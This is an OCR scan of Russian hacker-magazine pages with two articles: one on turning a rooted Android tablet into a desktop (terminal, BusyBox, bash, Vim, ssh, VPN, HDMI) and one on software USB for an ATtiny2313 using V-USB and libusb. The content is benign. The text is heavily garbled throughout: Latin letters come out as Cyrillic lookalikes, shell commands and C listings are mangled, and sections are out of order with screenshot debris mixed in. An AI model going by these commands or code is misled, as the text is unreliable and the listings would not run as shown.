<ССг1 + В> - закладки 

<Сі:г1 + Н> - история 

<С1:г1 + 0> - добавить в закладки 

<ССг1 + $> - поделиться . 

<ССг1 + С> - информация о странице 

кС'ЬгІ + Р> - окно настроек 
<С1Ьг1 + 1л(> - закрыть вкладку 

<Сіп1 + 1> - фокус на адресную строку 

<5расе/5Ы^1: + 5расе> - перемотка на экран | и і 

кС'ЬгІ + С/Ѵ> - копирование/вставка 

кС'ЬгІ + ТаЬ> - переключение между вкладками 



АЮЕ позволяет создавать полноценные ^аѵа-приложения для АпЦгоісІ в самом АпсІгоісІ 



К сожалению, в АпсІгоісІ нет способа 
изменить комбинации клавиш или доба- 
вить свои, но имеющихся будет вполне 
достаточно, чтобы работать с планшетом 
без всякой мыши, лишь иногда прикасаясь 
к экрану — выбрать какой-то труднодося- 
гаемый элемент интерфейса. 

Раз уж мы заговорили о браузере, 
то нужно позаботиться и о подключении 
к интернету. Далеко не все планшеты осна- 
щены модулем ЗС, поэтому интернет тебе, 
скорее всего, придется забирать другими 
способами. Два стандартных решения — 
это ЗС-модем или интернет с телефона. 
Первый вариант более предпочтителен, 
однако на планшетах с одним хост-портом 
(как у меня) он не позволит воткнуть еще 
и клавиатуру. Вариант с раздачей интерне- 
та с телефона по ѴѴі-Рі очень удобен, но вы- 
жирает батарею смарта с невероятной ско- 
ростью, поэтому гораздо лучше для этой 
цели использовать более экономичный 
ВІиеІооШ. 

Ситуация с синим зубом в АпсІгоісІ до- 
вольно странная, и его поддержка сильно 
разнится от версии к версии. Тем не ме- 
нее раздача интернета по ВІиеІооІІі (про- 
филь РАМ) поддерживается уже давно, и, 
скорее всего, она уже есть в смартфоне 
(искать следует где-то в районе «Беспро- 
водные сети Дополнительно -► Режим 
модема»). Чтобы подключиться к такому 
«транслятору», Ооодіе рекомендует вы- 
брать нужное ВІиеІоо^М-устройство в спи- 
ске в разделе «Профили» и отметить пункт 



«Использовать для доступа в интернет». 
Но на практике такого пункта зачастую про- 
сто не существует, поэтому для подключе- 
ния придется использовать независимую 
реализацию профиля РАМ, например 
«ВІиеІооІИ РАМ» из маркета. Она требует 
гоо^, но зато пользоваться ей проще про- 
стого: запустил, нажал на огромную кру- 
глую кнопку посередине экрана. 

Чтобы в дороге иметь доступ ко всем 
необходимым данным, можно заранее 
скинуть их на флешку или использо- 
вать облачные диски вроде ОгорЬох или 
Ооодіе Огіѵе. Оба подхода неудобны, так 
как не позволяют выполнять синхрони- 
зацию автоматически. Зато приложение 
Огорзупс это умеет и делает очень хоро- 
шо. Фактически Огорзупс выполняет ту же 
задачу, что и настольная версия ОгорЬох: 
позволяет хранить файлы на флешке, пе- 
риодически синхронизируя их с облачным 
хранилищем. Что немаловажно, каталоги 
для синхронизации можно выбирать инди- 
видуально, отправляя и получая из облака 
только то, что реально нужно на планшете, 
например книги, музыку, исходные тексты. 

Пользоваться Огорзупс довольно про- 
сто, надо лишь выбрать каталог для син- 
хронизации, каталог в ОгорЬох и выбрать 
метод синхронизации: в одну сторону 
или в обе. После этого софтина повиснет 
в фоне и будет периодически выполнять 
синхронизацию. Сразу рекомендую купить 
Рго-версию, в ней реализована поддержка 
□пих-технологии іпоІіТу для моментальной 



Чтобы в дороге иметь доступ ко всем 
своим данным, можно заранее скинуть 
их на флешку или использовать облачные 
диски вроде ОгорЬох или Соодіе ОгІѵе 
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синхронизации сразу после изменения файлов, а также убрано 
ограничение на размер файла в 5 Мб и на один синхронизиру- 
емый каталог. 

ПРОДВИНУТЫЙ ВАРИАНТ 

Поговорим о более продвинутом использовании планшета. 
Для гика, а тем более человека, выполняющего администри- 
рование удаленных серверов, стандартной функционально- 
сти и обычных приложений будет, конечно же, недостаточно 
для ощущения себя полноценным. Поэтому нам необходимо 
обзавестись джентльменским набором линуксоида, а имен- 
но эмулятором терминала, набором утилит командной стро- 
ки, а также разными 38Н-клиентами и гзупс’ами. Всего этого 
для АпбгоісІ полно, спасибо ядру Ыпих. 

Перво-наперво получим на планшете гооі. Как это сделать, 
мы уже рассказывали, тем более что для каждого устрой- 
ства своя методика, включающая в себя много нюансов. По- 
этому Ооодіе в помощь. Далее ставим АпбгоісІ ТегтіпаІ Етиіаіог 
из маркета, это стандартный ѴТ 102-эмулятор с поддержкой 
всего, что нужно. Он поддерживает все управляющие последо- 
вательности, а значит, все комбинации клавищ, которые ты бу- 
дешь набирать на клавиатуре. 

Стандартная инсталляция Апбгоісі включает в себя ограни- 
ченный набор утилит командной строки (в котором нет даже 
команды ср), но его легко расширить до полного, просто 
установив ВизуВох с помощью одного из многих инсталля- 
торов, доступных в маркете. После этого можно обзавестись 
и нормальным Ьазіі вместо убогого зИ, идущего в комплекте. 
Для этого устанавливаем СМІ) ЬазИ 4.2 ІпзІаІІег, запускаем 
и нажимаем кнопку «ІпзІаІІ». Чтобы эмулятор терминала знал, 
что мы хотим при запуске сразу попасть в Ьазіі, идем в на- 
стройки терминала и в опции «Командная оболочка» указыва- 
ем путь «/зузІет/хЬіп/Ьазіі -». 

Отныне у нас есть полноценная командная строка, но нет 
85Н-клиента и хорошего текстового редактора. Решить эту про- 
блему можно, установив старый добрый СоппесШоІ и Ѵіт ТоисИ. 
Как независимые инструменты они выполняют свою работу ве- 
ликолепно, но использовать их продуктивно при наличии клави- 
атуры и при необходимости править различные файлы прямо 
из терминала не получится. Поэтому мы установим нативные 
версии этих программ. Консольный Ѵіт для АпсІгоісІ можно по- 
лучить по этой ссылке: ЬіІ.Іѵ/ѴѴВоихи . Его следует распаковать, 
перекинуть на карту памяти планшета, а затем положить в ката- 
лог /зузІет/хЬіп. Вот как это сделать прямо в АпсІгоісІ: 

Установка консольного Ѵіт 
$ 5Ц 

# ср /5с1сагс1/путь-до-6инарника ..е 

/5уз1:ет/хЬіп 

# сИтосІ +х /зузіет/Ьіп/ѵіт 

88Н-клиент, в свою очередь, есть в приложении 88Н0гоіс1. 
Все, что нужно сделать, — это установить 88НОгоісІ и скопиро- 
вать 88Н-клиент в каталог /зузІет/хЬіп: 



Установка ззЬ 

$ 5Ц 

# ср /с1а1:а/сІа1:а/Ьег5егкег,апсІгоісІ.«-^ 
аррз . 55ІісІгоісІ/сІгорЬеаг/55Іі ^ 

. /5у5І:ет/хЬіп 

# сИтосІ +х /зузІіет/хЬіп/ззИ 

Можно пойти еще дальше и установить 
целый Ыпих-дистрибутив, в котором бу- 
дет все, что ты хочешь. Особенно удобно 
для этого использовать АгсИ Ыпих ІпзІаІІег, 
который устанавливает в образ минималь- 
ный АгсИ Ыпих без всяких ненужных иксов 
и прочего хлама. А благодаря арчевой фи- 
лософии гоіііпд-релизов ты всегда будешь 
иметь наисвежайший софт, без необходи- 
мости устанавливать новую версию дис- 
трибутива. Сам инсталлятор невероятно 
прост, поэтому не буду описывать его ис- 
пользование. 



не пустят. Далее жмем «Добавить профиль 
ѴРМ» и указываем тип ѴРМ (стандартный 
РРТР, 1_2ТР/1Р8ес, 1Р8ес ХаиІИ или 1Р8ес 
НуЬгісІ), вбиваем имя профиля, адрес сер- 
вера и ключи, если необходимо (для РРТР, 
естественно, не нужно). Сохраняем, тапа- 
ем на имя профиля, вбиваем логин и па- 
роль, и весь трафик начинает идти через 
туннель. 

Если ты собираешься заняться в пути 
кодингом, то в Соодіе РІау для этого есть 
масса инструментов. Для создания не- 
больших подсобных утилит и скриптов 
можно использовать среду 8Е4А (соба 
доодіе.сот/р/апбгоіб-зсгірііпо ). которая 
позволяет выполнять скрипты, написан- 
ные на ЗІ 1 , РуІИоп, РиЬу, РегІ, ^иа и дру- 
гих языках. Среда оснащена редактором 
и простым АРІ, позволяющим получить до- 
ступ к основным функциям планщета. 



Необходимо обзавестись эмулятором 
терминала, набором утилит командной 
строки, а также разными 58Н-клиентами 
и гзупс’ами. Всего этого для АпдгоШ полно 



Понятно, что во время удаленной рабо- 
ты нам, скорее всего, придется выходить 
в Сеть через ѴРМ, поскольку открытые ѴѴі- 
Рі в разных кафетериях и гостиницах дове- 
рия не вызывают просто по определению. 
В новом Апбгоіб теперь есть поддержка 
ѴРМ прямо из коробки, поэтому никаких 
проблем настройка проксирования не вы- 
зовет. Просто идем в настройки «Беспро- 
водные сети — > Еще...», жмем ѴРМ, Апбгоіб 
предлагает задать РІМ или пароль, это при- 
дется сделать, так как иначе дальще нас 



Для более серьезных разработок 
можно использовать среду ОРуІІіоп, ко- 
торая, кроме АРІ 814А, предлагает доступ 
к нативному Апбгоіб АРІ, а также кросс- 
платформенной библиотеке графических 
виджетов Кіѵу. Созданные с помощью 
ОРуІІіоп приложения почти не будут ви- 
зуально отличаться от нативных. Среда 
РиЬоІо ІРВ вообще предлагает полный до- 
ступ к Апбгоіб баѵа АРІ, но для языка РиЬу. 

Особо хотелось бы отметить среду 
АЮЕ, позволяющую создавать полноцен- 



ВИРТУАЛЬНАЯ КЛАВИАТУРА ДЛЯ АНОКОЮ-ПЛАНШЕТОВ 

Эффективно работать в эмуляторе терминала можно и без хардварной клавиатуры. 

Для этого нужно просто установить клавиатуру Наскег’з кеуЬоагб, на которой есть клавиши 
<С1г1>, <А11>, стрелки навигации, отдельная строка с цифрами, а также отдельная панель 
с клавишами <Р1-Р12>. 
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Эмулятор терминала и Наскег’з кеуЬоагсІ 




Старый добрый ѴІт в новой графической упаковке 
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Чехол со встроенной клавиатурой оказался велик... 



шая картинка» исчезает. Отключить такое 
поведение средствами самого АпРгоісІ 
не получится, но можно воспользоваться 
великолепной программой Зсгееп ЗіапсіЬу, 
которая принудительно отключает заднюю 
подсветку экрана, так что можно спокойно 
смотреть видео, играть в игры или серфить 
инет, не отвлекаясь на копию изображения 
на планшете. 

Зсгееп З^апРЬу имеет множество 
весьма полезных настроек, например 
отключает подсветку самостоятельно 
при втыкании НОМІ-кабеля. Для этого до- 
статочно включить опцию «Аиіо НОМІ/МНІ 
□еіесііоп» в разделе «НОМІ Оеіесііоп» 
(там же есть и настройки отключения 



ВТ СопІгоІІег следует устанавли- 
вать на оба девайса, которые уже свя- 
заны между собой по ВІиеІооШ. Далее 
на одном из устройств нажимаем кноп- 
ку «Соппесі», после чего на экране по- 
явится сообщение с просьбой выбрать 
функцию устройства: СопІгоІІег или НозТ 
Нажимаем на планшете Нозі, после чего 
в правом верхнем углу появляется ин- 
формационная табличка, символизиру- 
ющая удачное подключение и работо- 
способность компонентов. Тап по строке 
«КВ ЕпаЫесІ» на табличке перебросит нас 
в меню настроек способов ввода, в кото- 
ром следует выбрать ВТСоШгоІІег, а тап 
по «КВ Асііѵе» позволит переключиться 



Интересная функция — перевод планшета 
в режим тачпада, когда на экране мони- 
тора появляется курсор, а экран планше- 
та превращается в большой тачпад 



Настраиваем ѴРЫ 



ные ^аѵа-приложения для Апсігоісі в самом Апсігоісі. Среда очень 
развитая, с полным набором всех необходимых функций, вклю- 
чая подсветку синтаксиса, автодополнение, онлайн-подсказки, 
компилирование и запуск одним нажатием. АЮЕ полностью со- 
вместима с проектами Апсігоісі ЗОК, ее действительно можно 
использовать для серьезной разработки. Особо хардкорные 
товарищи могут установить ОМІ) (ЗСС С/С++ Сотрііег, тот са- 
мый ССС и Ріпиіііз, позволяющие собирать софт в консоли. 

НОМІ 

Таская с собой планшет, да еще и имея подключаемую к нему 
клавиатуру и мышь, ты наверняка захочешь подцепить его 
к НОМІ-порту телевизора или АѴ-ресивера. В принципе, здесь 
все просто и до скучного удобно: воткнул кабель и получил кар- 
тинку на большом экране. Но есть несколько интересных мо- 
ментов, о которых я хотел бы рассказать. 

Гашение экрана. Одна из наиболее удручающих особен- 
ностей реализации поддержки НОМІ в Апсігоісі — это необхо- 
димость держать экран включенным. Как только ты нажимаешь 
кнопку выключения планшета, НОМІ обесточивается и «боль- 



при запуске приложения или помещения 
в док). Еще одна очень интересная функ- 
ция — это перевод планшета в режим 
тачпада, когда на экране монитора по- 
является курсор, а экран планшета пре- 
вращается в большой тачпад. Включается 
в меню «Зейіпдз — ТоисІірасІ зейіпд -» Узе 
ІоисИрасІ ^ипсііоп», но у меня эта функция 
не заработала, что предсказуемо, учиты- 
вая ограниченную поддержку моделей. 

Джойстик и пульт управления. План- 
шетом, подключенным к монитору или 
телевизору, можно управлять не только 
с помощью клавиатуры и мыши, но и ис- 
пользуя смартфон на том же андрои- 
де. Не обязательно для этого заходить 
на планшет по 58Н или другими средства- 
ми. Можно воспользоваться виртуальным 
джойстиком ВТ СопІгоІІег из маркета. Эта 
программа позволяет превратить смарт- 
фон в виртуальный синезубый джойстик, 
пульт управления или даже клавиатуру — 
тут уже кому что необходимо. 



на ВТ СопІгоІІег вместо стандартной кла- 
виатуры. 

Когда все эти операции будут выпол- 
нены, можно использовать появившийся 
на экране джойстик. В бесплатной вер- 
сии приложения только один вариант 
интерфейса — это джойстик 5МЕ5, с по- 
мощью которого довольно удобно играть 
в игры, но для других целей он не годит- 
ся. Платная версия ВТ СопігоІІег позво- 
ляет выбрать между более чем тридца- 
тью различными джойстиками, пультами 
и клавиатурами и, что еще более важно, 
создать новый пульт самому с помощью 
специального редактора. 

ВЫВОДЫ 

Планшет на АпРгоісІ действительно можно 
превратить в полноценный десктоп, ко- 
торым приятно пользоваться. Настоящий 
ноутбук на линуксе он, конечно, не заме- 
нит, но особых проблем в использовании 
ты тоже не заметишь. Ю 
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Разработка различных устройств 
на основе микроконтроллеров — 
занятие, достойное настоящего 
компьютерного гика. Несомненно, 
полезной фишкой любого гаджета 
будет иЗВ-интерфейс для подклю- 
чения к компьютеру. Но что делать, 
если в микросхеме АѴР не пред- 
усмотрена аппаратная поддержка 
изв? 
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Подключение 115В к микроконтроллеру АТ1іпу2313 



Ѵ-У8В: РАЗМЕР ИМЕЕТ ЗНАЧЕНИЕ 

При разработке собственного гаджета часто встает проблема 
его подключения к компьютеру. Надо сказать, что порты ^РТ и 
СОМ — теперь экзотика на материнских платах ПК, не говоря 
о ноутбуках, у которых эти интерфейсы исчезли давным-давно. 
Поэтому у современных компьютеров практически не осталось 
альтернатив интерфейсу ІІЗВ. 

Если ресурсы чипа используются на все сто процентов, то 
лучше сразу смотреть в сторону устройств с аппаратной под- 
держкой универсальной последовательной шины (такие микро- 
контроллеры присутствуют в линейке любого производителя). 
В остальных случаях можно использовать софтовый ІІЗВ. 

Для микроконтроллеров А!те1 существует замечательный 
проект Ѵ-изв, который предлагает программную реализацию 
низкоскоростного устройства ІІЗВ 1.1. Код Ѵ-ІІЗВ будет ра- 
ботать на любом устройстве АѴР, у которого есть хотя бы 2 Кб 
Ріазіі-памяти и 128 байт ОЗУ, с тактовой частотой 12; 12,8; 15; 
16; 16,8 или 20 МГц. 

Использование продукта возможно как в рамках ореп зоигсе 
лицензии ОРГ, так и на коммерческой основе. Для того чтобы 
разрабатывать собственные ІІЗВ-устройства, обычно также 
нужно покупать что-то вроде лицензии. Но ребята из Ѵ-УЗВ по- 
заботились и об этом, приобретя пару Ѵепсіог Ю — Ргосіисі Ю и 
разрешив их использовать любому желающему. 

Аппаратная обвязка для подключения УЗВ-шины к микро- 
контроллеру очень простая. Если устройство потребляет не 
слишком много, то запитать его можно прямо от шины (считает- 
ся, что линия питания ІІЗВ компьютера способна отдавать ток до 
500 мА). Так как информационные линии (0+ и 0-) используют 
уровень сигнала 3,6 В, кроме токоограничивающих резисторов, 
необходимы стабилитроны для согласования с 5-вольтовой логи- 
кой чипа. Чтобы обозначить тип подключения, нужно «подтянуть» 
напряжение питания через сопротивление 1 ,5 кОм к линии 0-. 

Альтернативный вариант сопряжения по ІІЗВ — снизить на- 
пряжение питания контроллера посредством соответствующей 



микросхемы стабилизации или просто парой диодов. Послед- 
нюю схему можно найти на сайте проекта Ѵ-ІІЗВ. 

ГОТОВИМ САНКИ 

Программный инструментарий, необходимый для реализации 
простейшей прошивки УЗВ-гаджета, предельно аскетичен: 
компилятор дсс-аѵг, библиотека аѵг-ІіЬс, программатор аѵгрисіе 
и набор Ьіпиіііз для АѴП. В ОеЬіап/ІІЬипШ все, что нужно, уста- 
навливается одной командой: 

$ зифо ар‘(:-ёе'1: іпзігаіі аѵгсіисіе Ьіпиіііз-аѵг ♦-і 

бсс-аѵг аѵг-ІіЬс „ 

На безбрежных просторах интернета несложно найти 
очень подробное руководство по Ѵ-ІІЗВ и ІіЬизЬ (на англий- 
ском). Согласно мануалу, для добавления поддержки ІІЗВ 
в проект потребуется папка изЬсІгѵ из архива с последней 
версией Ѵ-ІІЗВ. В корне этой папки есть шаблон конфигура- 
ции изЬсопТід-рго^оІуре.И. Нужно сделать копию этого фай- 
ла, назвав ее изЬсоп^ід.Іі. Далее — исправить изЬсопТід.Ь, 
указав порт (О), линии которого будут использоваться для 
ввода-вывода, непосредственно номера линии 0+ (2) и 
О- (3), а также частоту (12 МГц), на которой работает чип 
(АТІіпу2313): 
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Чтобы воспользоваться лицензией Ѵ-ІІЗВ для устройства, 
числовые идентификаторы производителя и устройства изме- 
нять не надо. А вот символьные имена можно выбрать по свое- 
му вкусу (они позволят отличить несколько устройств на основе 
Ѵ-ІІЗВ, подключенных к одному и тому же компьютеру): 



г > » I I » ( у I I } * I .. 
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ЗАДЕЙСТВУЕМ 

изАкт/идкт 

Хорошая альтернатива 
программному/аппарат- 
ному 1158 - использова- 
ние в чипе популярного 
интерфейса УЗАВТ/ 
УАВТсо сторонним 
преобразователем этого 
протокола в и$В, кото- 
рый можно выполнить, 
например, на основе 
микросхемы ГГ232В1. 



ПРОГРАММАТОР 0$ВТ1МУ 




Для микроконтроллеров АѴВ существует множество различных программаторов. 
ІІЗВбпу здесь упоминается, в частности, потому, что содержит программную реа- 
лизацию изв, аналогичную Ѵ-УЗВ. Схема этого программатора проста: версия 2 со- 
держит две микросхемы, а первая версия — лишь одну (собственно чип АТбпу2313). 
Благодаря подробному описанию на сайте и простым комплектующим устройство 
легко сделать даже начинающему. иЗВбпу совместим с популярной программой 
аѵгсіисіе, используемой для программирования микроконтроллеров АѴВ. 

Единственная проблема заключается в заливке прошивки в чип программато- 
ра — для этого нужен... программатор. Если есть компьютер с ІРТ-портом, то можно 
сделать один из вариантов РВРРС ака «пять проводков», который железно работает с 
программой АѴРеАІ. 
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РАЗНООБРАЗНЫЕ ГАДЖЕТЫ 



У тебя есть идея какого-нибудь устройства? Не спеши паять и 
кодить, а поищи, возможно, кто-то подобное уже делал. Если 
не получится воспользоваться готовыми схемами и исходни- 
ками, то хотя бы не придется начинать все с нуля. 

Например, проект Ѵ-ІІ5В благодаря лицензионной поли- 
тике накопил приличную базу готовых (в том числе и свободно 
распространяемых) решений. Здесь можно найти различные 
реализации клавиатур, УЗВ-адаптеров для джойстиков, 
геймпадов (в том числе и раритетных, например 5МЕ8/МЕ5, 
Міпіепсіо 64, 2Х Зресігит джойстик, 8опу РІауЗіаІіоп 1/2) 
и тому подобное. Адаптеры ОМХ, виртуальные порты СОМ 
и ІІАВТ, і2с, 8егѵо, беспроводные интерфейсы ОСР77, ІР — 
все, что поможет подключить к ПК больше новых устройств. 
Логгеры, платформы для датчиков и сенсоров, адаптеры для 
ЕСО-дисплеев, программаторы и загрузчики также могут 
оказаться полезными в хозяйстве. 
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ПРОГРАММАДЛЯЧИПА-ЭЛЕМЕНТАРНО! 

При взаимодействии по шине 118В компьютер — это главное 
устройство, которое периодически отправляет управляющие 
сообщения-запросы. Контроллер, соответственно, подчи- 
ненное и должен отвечать на запросы. Формат управляющего 
сообщения определяется структурой и8ЬВедиез1_1 из файла 
изЬсІгѵ.Іі: 
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ЬтКедиезІіТуре; . 


исЬаг 


ЬКедиезІ:: 
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ѵѵІеп^ІіЬ: 



} изЬКедиезІ:^!:; 

Создадим файл таіп.с на одном уровне с папкой изЬсігѵ и 
опишем в нем необходимые заголовочные файлы, определе- 
ния и переменные: 
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Ш СКОІѴ8 

Оіѵкіе сіоск Ьу 8 



НідЬ 

ООѴѴЕЫ 

оеьцдМЙЕ ЕпаЬіе 



Опііпе -калькулятор фьюзов 




ѵѵѵѵѵѵ 

Сайт проекта Ѵ-УЗВ: 
ѵѵѵѵѵѵ. оЬсІеѵ.а!/ 
ргосІисІз/ѵизЬ/ 

Сайт проекта ІіЬизЬ: 
ѵѵѵѵѵѵ.ІіЬизЬ.ого 
Сайт проекта ІіЬизЬ-ѵѵіп32: 
ооо.оІ/озСВЗ 
Руководство по Ѵ-ІІЗВ 
иІіЬизЬ(англ.); 

ооо.оІ/пІІкЗ 
Статья про ІіЬизЬ, 
часть 1 : зѵттеігіса.пеі/ 
изЬ/изЫ.ИІт 
часть 2: зѵтте1гіса.пе1/ 
изЬ/изЬ2.Гі!т 
Устройства на основе 
Ѵ-ЦЗВ: ооо.аІ/51Маз 
Сайт проекта иЗВііпу: 
ѵѵѵѵѵѵ. Іасіѵа(іа.пе!/таке/ 
изЬііпѵізо 

Сайт проекта АѴРеАІ; 
геаі.кіеѵ.иа/аѵгеаі 
Опііпе-калькулятор 
фьюзов: 

ѵѵѵѵѵѵ.епоЬегісІесі.сот/ 

!изесаІс 



Далее научим контроллер принимать данные (ОАТА_ІМ) и от- 
правлять их компьютеру (ОАТА_ОІЯ). Тип запроса указывается 
в поле ЬВедиезІ управляющего сообщения. 

В таіп.с переопределим функцию изЬРипсІіоп8е1ир, кото- 
рая вызывается автоматически при получении нового запроса: 

иЗВ^РІІВІІС исЬаг. изЬРипсТіопЗеТирСисІтаг с1аТа[8]) { 

изЬКедиезТ^С *гр = (ур.ір ,*)с1а-1:а; 

5ѵѵіТс|і(гя->ЬКедие5І:) { 

сазе. ОАТ А_оит : ../У . Обрабо.та.ть ..ком.а иду. 

УЛ.ШПравки ^аанных 

изЬМ5§Р1:г = герІуВиТ; // Указать буфер 

.геТигп.. 5.і2.ео.Т ( герІуВиТ) У /. .Воз.вр.атить. р.а^^^ 

/У буфера. .. 

саз.е РАТА_Ш; .// . Обраб.рша- К 

//.данных 

. ,У/. Получить длину 

сІаТаІепбТЬ = (исІіаг)гя->ѵѵІеп8ТИ.ѵѵогсІ; 

сІаІіаРесеіѵесІ = 0; .// Вызовов .изЬРипсТірп^^ 

/У будет много 

II Проверка на переполнение 

.іТСсІаТаІепбТІі > .5І2.ео-Р(гер1уВи-Р) ) 

сІаТаІепёТІі = 5І.2ео-Р(гер1уВи-Р); 

. .геСигп . и5В_М0_М5С; .У/...В.оз.вратит^^^ 



} 

--ГеТ.и.г.п. .0;. 



} 



Благодаря лицензионной политике проект 
Ѵ-ІГ5В накопил приличную базу готовых 
(в том числе и свободно распростра- 
няемых) решений 



Как видно из листинга, самый простой способ отправить 
данные компьютеру — установить в изЬРипсІіоп8еІир зна- 
чение указателя изЬМздРІг на буфер ОЗУ (герІуВиТ), где на- 
ходятся данные, а затем вернуть его длину. Размер буфера 
не должен превышать 254 байта. Для АТІіпу2313 с его 128 
байтами ОЗУ этого достаточно. Для более функциональных 
устройств есть второй способ — переопределение функции 
изЬРипсІіопРеасІ. 

Чтобы получить данные, во-первых, нужно в функции 
изЬРипсІіопЗеІир извлечь длину сообщения из поля ѵѵІепдШ 
запроса и сохранить ее в глобальной переменной сІаІаІепдШ. 
Во-вторых, в таіп.с требуется переопределить функцию 
изЬРипсІіопѴУгіІе, предназначенную для обработки получаемых 
данных и вызываемую автоматически (и очевидно, несколько 
раз), если изЬРипсІіопЗеІир возвращает значение 118В_МО_ 
М80 (255): 
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и5В_РивіІС исііаг и5ЬРипс1іоп1лІгі1:е(исІзаг *сіа1:а,4-. 

исМаг Іеп) { 

исЬаг і; 

// Сохранить., получен данных в. буфер 

1ог(і = 0; сІаІіаКесеіѵесІ < аа1:аІеп§‘1:Ь && 

Іеп; і++^ сІа1:аКесеіѵесІ++) 

гер1уВи-Р[(^а-^аКесеіѵесІ] = гіа:ЬаІі]; 

„_ге1ипп (сІа1:аКесеіѵесІ == сІа-ЬаІеп^ѣнЬ 

і 

Собственно, функция изЬРипсІіопѴѴгіІе занимается тем, что за- 
полняет буфер герІуВиТ полученными данными. 

Кстати, чтобы этот метод работал, нужно внести изменения 
в изЬсопТід.^і: 

#сІебпе и5В_СРС_ІМРІЕМЕМТ_РМ_1лІКІТЕ , .1 

Ну и последняя функция прошивки — таіп: 

Іп:^ таіп(.)і,,;С 

и 5 Ыпі! ( ) ; //.. Инициал и зироват 

ц5ЬС)еѵісеСрппес‘1:( . Подключить ус^ 

5еі(); .// . Разрешить прерывания 

/./ В 6еско.не,чнрм..цикле_ 

У-/., сообщения 

цНі1е(1) изЬРоІІО; 

геііигп 0і__ 

} г 

иви$в: и НЕ ОДЕТАЯ, МНЕ ОБНАЖЕННАЯ 

Ты спросишь: а придется ли писать драйвер для опера- 
ционной системы компьютера, чтобы подключить 1)5В- 
устройство? Если использовать ІіЬизЬ, то можно обойтись без 
реализации полноценного модуля ядра. ЫЬизЬ — это ореп 
зоигсе библиотека, которая позволяет быстро запрограмми- 
ровать, во-первых, поиск устройства на шине, а во-вторых — 
обмен данными с ним. 

Под Упих библиотеку и необходимые заголовочные файлы 
можно получить из исходных кодов. А лучше воспользоваться 
стандартным репозиторием твоего дистрибутива. Для ОеЬіап/ 
ІІЬипІи, например, так: 

$ зисіо арі-яеі: іпз-ЬаІІ ИЬизЬ-сІеѵ 

Существует также порт ІіЬизЬ под ѴѴіпРоѵѵз — ІіЬизЬ-ѵѵіп32. 
Вопреки названию проекта, также поддерживаются 64-битные 
ОС от МісгозоЙ (начиная с версии 1 .2.0.0). 

Но ІіЬизЬ — это отдельная тема разговора. Думаю, с про- 
граммированием для ПК ты знаком и сможешь в этом разо- 
браться сам. Поэтому буду краток. Создаем файл изЫезЬс и 
начинаем наполнять его контентом. Сначала необходимые за- 
головочные файлы и определения: 

#іпс1исіе <5І:сІіо.И> 

[.-•■] _ _т__ 

//.Для комп ьюте р а смыс л .. к о н ы й ^ 

/У...НО. обознач^^ те же. 

#аебпе 0АТА_0иТ 1 ^ 

#с1ебпе 0АТА_ІМ 2 

Функция изЬОрепОеѵісе для инициализации устройства: 

и5Ь__іпіі^ О I / /...Ишмиа.л изиррват^^ Ц5В 

изЬ^бпсІ^Ьиззез ( ) ; 

изЬ_бпсІ_(іеѵісе5(); // Н устройства 

/У...Пеі)е6р.ать ..все .шины __ 

-Ррг(Ьи5=изЬ_бе‘1:_Ьи55е5С); Ьи.з; Ьи5=Ьи5->пех1:) { 

/./...Перебр.атц .вс.е ус на шине 

:Ррг(сІеѵ=Ьи5->аеѵісе5; Реѵ; сіеѵ=сіеѵ->пех1:) { 

/У--^сли иііентифи вендора и продукта 

//..не...с.р.в.пада!рт , . . 

,і-Р(сІеѵ->с1е5сгір1;оГѵісІѴепс1ог ..Ь_.уепс1ог Ц 
сіеѵ- >сІе5сгір1:ог . ісІРгоРисІ: ! = ргосІисІС) 

с.рпііпие; // . . . пропустить , эту . .итерацш 

//---Прпррбрвать .получцть устройства 

М( ! (ИапРХе = и5Ь_ореп(сІеѵ))) { 



Тегтіпаі 



Файл Правка Вид Поиск Терминал Справка 

пе^@ле'(1у - $ зисіо ./изЫезІ: оиі 
[зиРо] раззѵ/огсі Тог пе^: 

Оо^ 16 Ьуіез: Неііо Ѵ\^огІс1! 

пеТ@пе^1у - $ зисіо ./изЬ^езХ іп хакер Тогеѵег 

пе^@пеігу - $ зисіо ./изЫез^ оиі 

Со'^ 16 Ьу1:ез: хакер Тогеѵег 

пе1@пегту $ 

Тестирование взаимодействия с АТипу2313 по 118В 
(заливаем в чип строку, а затем считываем ее) 



■РргіпТ-Р(з1:Регг, "%з\п"^ изЬ_зТпеггог( ) ); 
сопТіпие; 

} 

геТигп ЬапсІІе; // Вернуть дескриптор 

} 

} 

/./ Устройство не найденр 
геТигп N1111; 



О 

оѵв 

На прилагаемом 
к журналу диске 
лежат исходные коды 
описанного в статье 
примера и последняя 
версия библиотеки 
Ѵ-У8В. 



Как видно, параметрами изЬОрепОеѵісе выступают число- 
вые идентификаторы производителя и устройства. В случае 
если устройство присутствует на шине, возвращается его де- 
скриптор. Если устройств на Ѵ-ІІ5В будет несколько — придет- 
ся дописать проверку символьных имен вендора и продукта. 

И функция таіп консольной утилиты изЫезІ: 




ірі;. таіпСіпІ: аг§с^ сЬаг **аг§ѵ) { 
/У Дескриптор устройств.а 
изЬ_сІеѵ__ІіапсІ1е *Ьапсі1е = N1)1.1;.. 

іпі: пВуІгез = 0; 

сЬаг Ьи-Р-Рег[256]; 



.// Ии^ем устройство 

ИапсІІе = изЬОреп^еѵісе(0x16С0^ 0Х05ОС); 
і-Р(Иапаіе == N^^^) 

■Рргіп1:-Р(з1:сІегг^ "Соиісі по.И бпгі Ц5В сіеѵісе! \п"); 
ехі1:(1); 

} 



/ / Ар гумен.т...о.и1: - получить да^ рт чира 

.Шз'І:гстр(агбѵ[1], "оиі:") == 0) { 

пВуІ:ез = изЬ_соп1;го1_тз§(ЬапсІ1ед 
^5В_^ТVРЕ_VЕN^0К 1 и5І_КЕСІР_0ЕѴІСЕ | - 



ркотЕи§ 

ОТДЫХАЕТ 

Всенародно любимый 
симулятор электриче- 
ских схем РгоІеизІЗІЗ 
бесполезен при раз- 
работке устройств с про- 
граммной реализацией 
1)8В. Его эмулятор 1)8В 
поддерживает только 
чипы с аппаратной под- 
держкой универсальной 
последовательной шины 
(например, АТ90ІІ8В646 
ИЛИАТ90У8В1286). 



СарТигіпд Ггот (І5В Ьиз гнітЬег 5: изЬтопб 


[Ѵі/ігезНагк 1.8.4 (5ѴН Кеѵ ипкпоѵгп Ггот ипкпомг _ о х ' 


ріе ЕсІіЧ уіеѵѵ бо СарШге 


Апаіуге 5131151105 ТеГерЬопу 


ІООІ. ,п«таГ5 неір 




■ ѳ 


Ц ІЙ 


"Э- # Й 


УІІ^ ^ ш о, - 


якег: 






; ^ 1 Ехрге$5іоп.. 


. СІеаг V 


N 0 . Тіте Зоигсе 


